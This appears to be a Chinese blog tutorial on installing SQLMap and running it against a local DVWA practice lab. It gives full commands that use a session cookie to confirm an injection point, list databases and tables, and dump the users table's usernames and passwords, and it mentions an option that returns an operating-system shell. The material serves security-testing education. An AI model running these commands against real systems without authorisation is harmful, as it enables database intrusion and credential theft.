安全测试必备工具---SQLMap 安装及基本应用

原创 已于 2024-12-21 21:04:27 修改 · 1.4k 阅读 · 28 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#SQLMap 安全测试
于 2024-12-21 21:02:52 首次发布

在信息化飞速发展的今天,安全漏洞的威胁与日俱增,尤其是数据库安全。SQL 注入被认为是最危险的网络攻击之一,而 SQLMap,则是测试人员应对这类威胁的强大工具!

作为一款开源的 SQL 注入检测和利用工具,SQLMap 有哪些功能?如何快速安装并应用于安全测试中?

近年来,SQL 注入漏洞引发的安全事故屡见不鲜,尤其在医疗、金融和教育领域,造成的用户隐私泄露和经济损失不可估量。SQLMap 的普及,使测试人员更好地预防此类漏洞,为数据安全筑起一道坚实防线。

如果你是一名安全测试人员或开发者,SQLMap 是你必须掌握的一项技能!想了解更多实用技巧和案例?

什么是SQLMap?

SQLmap是一款由python开发的用来检测与利用SQL注入漏洞的免费开源工具。支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBMDB2、SQLite等数据库。有一个非常棒的特性,即对检测与利用的自动化处理(如数据库指纹、访问底层文件系统、执行命令)。

SQLMap下载

官方网站下载: http://sqlmap.org/

图片.png

这里选择Github去下载

图片.png

win10下SQLMap安装

1、先安装好python环境,不管是2还是3版本都支持(python安装过程略,自行百度解决)。安装后可cmd命令窗口输入python -V 查看到版本信息即为成功。

图片.png

2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录

3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用

图片.png

SQLMap的常用参数

如果不想用之前缓存这个目标的session文件,可以使用这个参数。会清空之前的session,重新测试该目标。

-u∶指定目标URL进行sql注入检测

--batch:自动去做问题应答

--cookie :当前会话的cookie值

--dbs: 查询当前网站所有数据库

-D:指定数据库名

--tables:查询数据库下的所有表名

-T:指定表名

--columns:指定查询所有字段

-C:指定字段的名称

--dump:查询并导出其数据,拖库

--current-db:获取当前数据库

--current-user :获取当前登录数据库用户名称

--users:查询数据库的所有用户

--password:查询数据库用户的密码

--os-shell:直接返回一个shell(如果存在的话)

-flush-session 刷新session文件

SQLMap的基本应用

基于DVWA靶场以下模块,进行SQLMap实操演示

图片.png

1、注入判断 -u

输入:python sqlmap.py -u http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit。去进行操作--会报错,需要登录。

图片.png

图片.png

2、添加cookie绕过登录

python sqlmap.py -u "http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low"。

运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch

图片.png

图片.png

通过以上结果可知,存在SQL注入点。

3、查询当下所有数据库

python sqlmap.py -u "http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" --dbs --batch

图片.png

4、查询指定库下的表名

python sqlmap.py -u "http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa --tables

图片.png

5、查指定表的所有字段

python sqlmap.py -u "http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa -T users --columns

图片.png

6、查询字段内容

python sqlmap.py -u "http://192.168.253.137:666/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=980svotqv5fdmcr5fpscqf8f83;security=low" -D dvwa -T users -C user,password --dump

这个过程有点慢,请耐心等待,最终得到表的所有用户及明文密码信息。

图片.png

最后

此文中提到的工具及技术操作,仅用于学术交流,请遵守《网络安全法》,严禁将此文中工具和技术用于非法攻击测试。

安全无小事,责任大如天。掌握像 SQLMap 这样的专业工具,不仅是技术能力的提升,更是为系统安全保驾护航的重要实践。

漏洞无情,工具有道。用 SQLMap 做安全测试,让你的系统牢不可破!

sqlmap安装及使用教程
weixin_63033353的博客
07-28 5597
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
SQLMap安装教程
weixin_45014379的博客
03-10 4953
注意:在python3环境下安装sqlmap的时候会提示需要在python2的环境下才能安装,其实在python3.6以后也都支持sqlmap了。
sqlmap下载和安装保姆级教程(附安装包)
最新发布
2503_91800161的博客
04-23 893
SQLmap安装使用指南 本文详细介绍了SQLmap工具安装配置和使用方法。首先需要配置Python环境,安装时勾选"Add Python to PATH"自动配置环境变量,并通过cmd验证安装。接着解压SQLmap文件到Python目录下,通过命令行测试安装是否成功。 使用教程包括基础检测命令(GET请求)、进阶场景(POST请求与Cookie)以及关键参数速查表。基础命令包括检测注入点、获取数据库名称、表名、字段和导出数据等操作。
【网络安全】sqlmap安装使用教程
碎冰冰
01-16 1435
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
Sqlmap下载和安装使用Windows
qq_43176656的博客
08-17 3722
sqlmap解题BUU SQL COURSE 1
sqlmap安装详细教程
hibugs
03-07 7401
sqlmap是一款自动化的SQL注入工具,其功能为扫描、发现和利用输入URL的SQL注入漏洞,并且内置了许多绕过的插件,支持的数据库也非常多:MySQL、SQLServer、Oracle,Access等等。
安全测试必备工具——SQLMap 安装基本应用
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
04-29 6983
检测SQL注入漏洞的专用工具是安全人士工具箱的必备品。Sqlmap是由python开发的用来检测与利用SQL注入漏洞的免费开源工具。它可以确定哪些参数、标头或数据元素容易受到SQL注入的影响,以及哪些类型的攻击是可能的。本文详细讲解这款神器的安装及使用。
Windows主机sqlmap安装及使用
XLbb的博客
05-07 7567
说明:sqlmap需下载python2.7.9版本、在win命令行运行。 1.1python安装: 设置环境变量:python的安装路径和scripts路径添加到电脑主机环境变量 步骤:打开环境变量:【此电脑】--右击属性-高级系统设置--高级-环境变量--admin的用户变量--Path--编辑--添加C:\Python27\Scripts和C:\Python27\--确认关闭 2、下载sqlmap软件文件。 打开sqlmap目录,在sqlmap软件目录下输入cmd进入命令行
SQLmap下载和安装教程(详细附图)
weixin_44023403的博客
01-13 2万+
SQLmap下载和安装教程一、准备:1、下载安装python二、下载安装sqlmap 一、准备: python2.X(要是python2) SQLmap python下载地址:https://www.python.org/downloads/ SQLMap下载: http://sqlmap.org/ 1、下载安装python 根据自己电脑系统,选择下载版本,以64bit,Win10为例; 这里下载有点儿慢,可以复制下载链接,用迅雷下载; 双击安装; 将“Add python.exe to Path”
渗透工具sqlmap下载安装超详细教程Windows
weixin_56306210的博客
07-20 1万+
渗透工具sqlmap下载安装超详细教程Windows
SQLMAP下载安装和使用(Windows)
weixin_68416970的博客
05-16 2万+
SQLMAP 是一款广泛使用的开源 SQL 注入检测和利用工具。本文介绍了SQLMAP下载安装基本使用。SQLMAP 这样的工具在合法的安全测试和研究环境之外的使用可能是非法的和不道德的。在实际应用中,应该在授权和合法的情况下使用它来帮助发现和修复系统中的安全漏洞,以提高系统的安全性。
常用的渗透测试工具 ——SQLMap (安装教程&入门教程)
Spontaneous_0的博客
10-27 1262
SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。SQLMap采用了以下5种独特的SQL注入技术。● 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
Sqlmap使用安装和命令详细教程
2301_77147676的博客
03-22 1514
-auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM) --auth-cred=ACRED HTTP身份验证凭据(用户名:密码) --auth-cert=ACERT HTTP认证证书(key_file,cert_file) --proxy=PROXY 使用HTTP代理连接到目标URL --proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码) --ignore-proxy 忽略系统默认的HTTP代理。
【每天学会一个渗透测试工具SQLmap安装教程及使用
菜鸟小羊的博客
07-04 1万+
Sqlmap是一款开源的渗透测试工具
【渗透工具sqlmap下载安装详细教程Windows/Linux(图文)
热门推荐
Z_David_Z的博客
01-27 2万+
目录==Windows安装Sqlmap:==1.Python2.7下载1.1 下载1.2 安装并配置环境变量2.sqlmap下载2.1 下载2.2 SQLMap安装2.3 建立快捷方式==Linux安装Sqlmap==1.下载sqlmap 源码进行安装2.解压运行3.进入安装目录,运行sqlmap脚本4.使用alias命令用来设置直接调用 Windows安装Sqlmap: 由于SQLMap是基于Python语言的,所以需要先安装Python语言环境 1.Python2.7下载 1.1 下载 地址:https
sqlmap安装教程+遇到的错误及解决方法
weixin_51593721的博客
07-03 5859
sqlmap下载教程以及遇到的错误,电脑的python版本是python2.7与python3.10。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值